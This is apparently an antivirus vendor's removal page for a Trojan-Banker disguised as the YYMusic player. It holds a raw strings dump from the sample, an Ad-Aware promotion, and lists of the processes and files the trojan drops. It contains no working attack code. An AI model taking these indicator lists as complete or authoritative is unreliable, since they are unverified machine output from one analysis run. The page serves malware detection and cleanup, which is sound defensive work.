ic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$sequence@U?$optional@U?$chlit@D@classic@spirit@boost@@@classic@spirit@boost@@U?$alternative@U?$chlit@D@classic@spirit@boost@@U?$sequence@U?$range@_W@classic@spirit@boost@@U?$kleene_star@Udigit_parser@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$sequence@V?$chset@_W@classic@spirit@boost@@U?$optional@V?$chset@_W@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$action@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@Ua_name@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$chlit@D@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spir
it@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
%Program Files%\YYMusic3\2014050713\YYMusic2.exe
125x125.jpg
320x225.png
astop.png
back.png
bg2.png
bg3.png
bg_2.png
bk.png
bkcolor_1.png
bkcolor_2.png
bkcolor_3.png
bkcolor_4.png
bkcolor_5.png
bkcolor_6.png
bkcolor_7.png
border.png
btn-anonymity.png
btn-delete.png
btn-fav.png
btn-login.png
btn-login2.png
btn-next.png
btn-pause.png
btn-play.png
BtnHidePlayList.png
BtnRightTop.png
btn_9k.png
btn_bd.png
btn_close.png
btn_comm.png
btn_db.png
btn_fh.png
btn_kw.png
btn_ok.png
btn_ok_blue.png
btn_ok_red.png
btn_sc.png
btn_xm.png
button.png
channel.png
close.png
collection.png
color_list_bk.png
dash.png
DefaultUserImage.jpg
downd.png
downda.png
downdahover.png
DownLoadProgressForeImage.png
exit.png
fbcaptionbk.png
feedback.png
font_bkcolor.png
font_forecolor.png
forecolor_1.png
forecolor_2.png
forecolor_3.png
forecolor_4.png
forecolor_5.png
forecolor_6.png
forecolor_7.png
forgettt.jpg
frmdownmenu.xml
FrmDropDownMenuFrame.xml
FrmFeedBack.xml
FrmHotKeyTip.xml
frmlogin.xml
FrmLrcChild.xml
FrmMenuFrame.xml
frmplayer.xml
frmplaylist.xml
frmProgressToolTip.xml
frmWebBrowser.xml
frmWindowLrc.xml
frmWindowLrcParent.xml
headimg.png
history.png
home.png
hotkeytipbk.png
icon.png
input-password.png
input-user.png
like.png
list.png
lista.png
listahover.png
list_item_bg.png
list_pause.png
list_play.png
list_scroll_bar.png
list_scroll_bar2.png
list_title_bg.png
loading01.png
loading02.png
loading03.png
loading04.png
LoginBk.png
LrcBk.png
lrclist.png
lyricdelete.png
lyricdeletea.png
lyricdeletea2.png
LyricFrameVoice.png
lyricmute.png
lyrictoplay.png
mainframeshadow.png
max.png
menu.png
min.png
mine.png
minea.png
mineahover.png
mini.png
more.png
musiclibrary.png
next.png
next0520.png
normalVolume.png
play0520.png
play2.png
playerbg01.png
playerbg02.png
playerlist.png
playersidebg.jpg
playinging.jpg
playinginga.jpg
playingnext.png
playingplaying.jpg
playingprev.jpg
playingpreva.jpg
playingrandom.jpg
playingrandoma.jpg
playingvoice.png
PlayProgressForeImage.png
pl_back.png
pl_bg.png
pl_big.png
pl_btn_down.png
pl_btn_on.png
pl_close.png
pl_color.png
pl_desktop.png
pl_feedback.png
pl_forward.png
pl_icon.png
pl_itself.png
pl_mutevol.png
pl_next.png
pl_pause.png
pl_prev.png
pl_res.png
pl_set.png
pl_small.png
pl_split.png
pl_vol.png
pop_bkimage.png
power.png
prev.png
prev0520.png
prevention.png
progresstooltip.png
progresstooltipbk.png
progress_fore.png
pushedVolume.png
random.jpg
random01.jpg
random01a.jpg
random01hover.jpg
random02.jpg
random02a.jpg
random02hover.jpg
random03.jpg
random03a.jpg
random03hover.jpg
random0520.png
reflash.png
remembertt.jpg
scrollbar.png
search.png
SelectColor_SliderBar_Thumb.png
slider_bg.png
sound (2).jpg
sound.jpg
sound100.jpg
steup.png
suspensionbig.png
suspensionbiga.png
suspensionbigahover.png
suspensionclose.png
suspensionclosea.png
suspensioncloseahover.png
suspensionfeedback.png
suspensionfeedbacka.png
suspensionfeedbackahover.png
suspensionlogin.png
suspensionmin.png
suspensionmina.png
suspensionminahover.png
suspensionset.png
suspensionseta.png
suspensionsetahover.png
suspensiontop.png
suspensiontopa.png
suspensiontopahover.png
system_menu_btnexit.png
system_menu_btnfeedback.png
system_menu_btnmin.png
system_menu_btnmini.png
system_menu_btnsteup.png
system_menu_btntop.png
sys_check_btn.png
sys_check_btn_blue.png
sys_check_btn_red.png
sys_check_btn_whiter.png
tab_comm.png
tooltipbk.png
update.xml
voice00528.png
voice0520.png
voice0a0528.png
voice1000528.png
voiceall0528.png
astop.png
bg2.png
bg_2.png
bk.png
btn-anonymity.png
btn-fav.png
btn-login.png
btn-pause.png
btn_9k.png
btn_bd.png
btn_close.png
btn_db.png
btn_fh.png
btn_kw.png
btn_ok.png
btn_ok_red.png
btn_xm.png
dash.png
exit.png
feedback.png
frmProgressToolTip.xml
frmWebBrowser.xml
headimg.png
home.png
input-password.png
list_item_bg.png
list_scroll_bar.png
list_scroll_bar2.png
list_title_bg.png
lrclist.png
min.png
more.png
next.png
normalVolume.png
playerlist.png
playingvoice.png
pl_back.png
pl_btn_down.png
pl_close.png
pl_feedback.png
pl_forward.png
pl_icon.png
pl_next.png
pl_small.png
pl_split.png
pop_bkimage.png
power.png
prev.png
steup.png
system_menu_btnfeedback.png
system_menu_btnsteup.png
system_menu_btntop.png
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
Skin\bkcolor_1.png
Skin\forecolor_1.png
Skin\bkcolor_2.png
Skin\forecolor_2.png
Skin\bkcolor_3.png
Skin\forecolor_3.png
Skin\bkcolor_4.png
Skin\forecolor_4.png
Skin\bkcolor_5.png
Skin\forecolor_5.png
Skin\bkcolor_6.png
Skin\forecolor_6.png
Skin\bkcolor_7.png
Skin\forecolor_7.png
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/rapidxml.hpp
D:\zhuyicheng\boost_1_53_0\boost/optional/optional.hpp
!p.empty() && "Empty path not allowed for put_child."
errorUrl
D:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml.hpp
D:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml_print.hpp
D:\zhuyicheng\boost_1_53_0\boost/smart_ptr/shared_ptr.hpp
D:\zhuyicheng\boost_1_53_0\boost/smart_ptr/scoped_ptr.hpp
D:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/impl/match.ipp
val.is_initialized()
D:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/match.hpp
c.stack.size() >= 1
Song.music_id
Song.artid
Song.name
Song.artist
Song.special
Song.artist_pic240
Song.mp3path
Song.mp3dl
http://
=data.xcode
data.songList
D:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/utility/impl/chset/range_run.ipp
r.is_valid()
tplayList.trackList
Assertion failed: %s, file %s, line %d
1.14.4.30
MusicPla.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ImeReg32.exe:1160
    setup_2948-140896.exe:2632
    axult.exe:1744
    MBManager.exe:2480
    %original file name%.exe:132
    YYSpeed2.exe:2084
    setup_qd304.exe:2396
    setup_qd304.exe:1972
    Mutual.exe:2224
    YYMusic2.exe:3844
    setup_open_341.:2660
    axuls.exe:884
    Config.exe:1952
    Power.exe:2536
    Power.exe:1772
    WJSpeed.exe:2880
    WJSpeed.exe:3020
    ApkReg.exe:2652
    wuauclt.exe:540
    wjplay.exe:1456

  2. Delete the original Trojan-Banker file.
  3. Delete or disinfect the following files created/modified by the Trojan-Banker:

    %System%\gswb.ime (8657 bytes)
    %Program Files%\YYMusic3\2014050713\avutil-52.dll (5520 bytes)
    %Program Files%\YYMusic3\2014050713\avcodec-54.dll (23424 bytes)
    %Program Files%\YYMusic3\2014050713\Data\dh.ini (56 bytes)
    %Program Files%\YYMusic3\2014050713\Data\client.ini (36 bytes)
    %Program Files%\YYMusic3\2014050713\Unins.exe (9320 bytes)
    %Program Files%\YYMusic3\2014050713\source.dll (6584 bytes)
    %Program Files%\YYMusic3\2014050713\audio.dll (3616 bytes)
    %Program Files%\YYMusic3\2014050713\pthreadGC2.dll (3616 bytes)
    %Program Files%\YYMusic3\2014050713\Data\version.ini (32 bytes)
    %Program Files%\YYMusic3\2014050713\Data\user2.ini (22 bytes)
    %Program Files%\YYMusic3\2014050713\DuiLib.dll (16288 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\配置工具\卸载YYMusic3.lnk (830 bytes)
    %Program Files%\YYMusic3\2014050713\avformat-54.dll (12088 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\官方主页.lnk (334 bytes)
    %Program Files%\YYMusic3\2014050713\YYMusic2.exe (63950 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\YYMusic3.lnk (835 bytes)
    %Program Files%\YYMusic3\2014050713\SysConfig.ini (256 bytes)
    %Program Files%\YYMusic3\2014050713\libav.dll (6360 bytes)
    %Program Files%\YYMusic3\2014050713\channels.xml (784 bytes)
    %Program Files%\YYMusic3\2014050713\favorfm.xml (440 bytes)
    %Program Files%\YYMusic3\2014050713\avcore.dll (2392 bytes)
    %Program Files%\YYMusic3\2014050713\YYSpeed2.exe (22552 bytes)
    %Program Files%\YYMusic3\2014050713\Data\setup.ini (122 bytes)
    %Program Files%\YYMusic3\2014050713\swresample-0.dll (3312 bytes)
    %Program Files%\vsgrtaho\hzsoft\setup_qd304.exe (47709 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_qd304[1].exe (54004 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.dat (7419 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.dat (7419 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.idx (396 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.idx (588 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.dat (7419 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wb.custom.txt (196 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\UseVestige.ini (58 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.idx (396 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.dat (7419 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.dat (560 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.idx (396 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.idx (2061 bytes)
    %Program Files%\gssoft\gswb\Dict\PYPhrases.dat (196 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (111712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\py.custom.txt (196 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.cmp (1993 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.cmp (4529 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Config.ini (107405 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.cmp (1993 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.cmp (1993 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.idx (300 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.cmp (9639 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (210 bytes)
    %Program Files%\gssoft\gswb\Dict\WBPhrases.dat (196 bytes)
    %Program Files%\vsgrtaho\dciman32.dll (8 bytes)
    %Program Files%\vsgrtaho\d3dim.dll (13480 bytes)
    %Program Files%\vsgrtaho\ialmuDAN.dll (1151 bytes)
    %Program Files%\vsgrtaho\devmgr.dll (10953 bytes)
    %Program Files%\vsgrtaho\dmocx.dll (3576 bytes)
    %Program Files%\vsgrtaho\vsgrtaho.exe (8912 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@t3nlink[1].txt (186 bytes)
    %Program Files%\vsgrtaho\axuls.exe (48238 bytes)
    %Program Files%\vsgrtaho\axult.exe (42791 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\popup[1].htm (627 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pic[1].gif (719 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_open_341[1].exe (426802 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_2948-140896[1].exe (606444 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\axult[1].exe (45478 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\yszj_zhimeng_160110[1].exe (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pwb[1].htm (961 bytes)
    %Program Files%\vsgrtaho\setup_open_341.exe (324463 bytes)
    %Program Files%\vsgrtaho\pwb.dll (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (801 bytes)
    %Program Files%\vsgrtaho\setup_2948-140896.exe (432700 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\softcount[1].htm (109 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\axuls[1].exe (49534 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@adsvc2.9365[1].txt (321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].php (1121 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (5204 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Program Files%\gssoft\gswb\Dict\Header.dat (2 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WbUpd.exe (26688 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\快乐女孩.gss (1552 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Tool.exe (22192 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ImeUtil.exe (60186 bytes)
    %Program Files%\gssoft\gswb\Dict\wb.idx (66168 bytes)
    %Program Files%\Common Files\gssoft\gssoft.ini (52 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe (25112 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\uninst.exe (11344 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Statistics.dll (19096 bytes)
    %Program Files%\gssoft\gswb\Dict\lx.dat (99214 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\gswb32.ime (39329 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Config.exe (37025 bytes)
    %Program Files%\gssoft\gswb\Dict\yy.dat (30464 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\wdj_connection_wrapper.dll (12088 bytes)
    %Program Files%\gssoft\gswb\Dict\gbk.idx (15168 bytes)
    %Program Files%\gssoft\gswb\Dict\url.dat (5 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WdjRelated.dll (40228 bytes)
    %Program Files%\gssoft\gswb\Dict\yy.idx (100378 bytes)
    %Program Files%\gssoft\gswb\Dict\py.s.idx (14184 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WdjEngine.dll (65930 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Expand.dll (46916 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\蓝色冰格.gss (1552 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\gswb64.ime (60186 bytes)
    %Program Files%\gssoft\gswb\说明.txt (195 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe (15168 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ImeReg32.exe (7192 bytes)
    %Program Files%\gssoft\gswb\Dict\gbk.dat (1856 bytes)
    %Program Files%\gssoft\gswb\Dict\py.u.v1.idx (457160 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Power.exe (9608 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\MBManager.exe (35507 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Service.dll (11344 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Wizard.exe (77238 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\WDJDriverPreinstaller.exe (8184 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe (8560 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\ImeReg64.exe (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (1110700 bytes)
    %Program Files%\Common Files\gssoft\gswb\gswb.ini (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp\System.dll (11 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\aapt.exe (197953 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\休闲.gss (2392 bytes)
    %Program Files%\gssoft\gswb\Dict\wb.dat (19152 bytes)
    %Program Files%\gssoft\gswb\Dict\dz.dat (16288 bytes)
    %Program Files%\gssoft\gswb\2.8.1.1120\Skin\环保绿.gss (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\metadl.dll (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\setup_qd304.gif.partial (101143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (8533 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\属性设置.lnk (792 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\设置向导.lnk (792 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\环保绿.gss (42 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\官方网站.url (230 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjEngine.dll (14988 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WbUpd.exe (5873 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SkinReg.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Mutual.exe (5441 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\wdj_connection_wrapper.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Service.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\休闲.gss (601 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WDJDriverPreinstaller.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ApkReg.exe (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb32.ime (8657 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\卸载光速输入法.lnk (792 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Statistics.dll (3361 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Tool.exe (4185 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb64.ime (14022 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\快乐女孩.gss (46 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\蓝色冰格.gss (34 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\休闲.gss (601 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SoftApp.ini (281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\快乐女孩.gss (46 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\aapt.exe (45940 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Wizard.exe (17627 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\MBManager.exe (7971 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg32.exe (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Expand.dll (10815 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\输入法管理器.lnk (797 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\uninst.exe (1425 bytes)
    %Program Files%\gssoft\gswb\官方网站.url (230 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg64.exe (1281 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\在线升级.lnk (785 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\蓝色冰格.gss (34 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Power.exe (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeUtil.exe (14022 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Config.exe (8281 bytes)
